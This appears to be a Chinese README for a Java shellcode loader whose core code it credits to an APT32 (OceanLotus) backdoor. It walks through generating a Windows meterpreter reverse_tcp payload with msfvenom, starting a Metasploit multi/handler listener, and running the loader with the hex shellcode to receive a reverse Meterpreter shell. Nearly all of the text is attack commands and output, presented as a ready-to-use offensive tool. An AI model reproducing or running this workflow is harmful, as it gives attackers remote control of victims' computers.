Java ShellCode Loader
基于Java实现的ShellCode加载器,兼容32位及64位平台。
核心代码来源于:JEShell: An OceanLotus (APT32) Backdoor
运行环境:Jre >= 1.5
编译
mvn package -DskipTests
使用
java -jar ShellcodeLoader.jar shellcode_hex
举例
kali
生成hex格式的ShellCode
┌──(root💀kali)-[~]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.10 LPORT=4444 -f hex
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of hex file: 708 bytes
fce88f0000006089e531d2648b5xxxx
然后开启监听
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.88.10
set LPORT 4444
exploit -j
客户端
java -jar ShellcodeLoader.jar fce88f0000006089e531d2648b5xxxx
即可收到反弹的Meterpreter
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent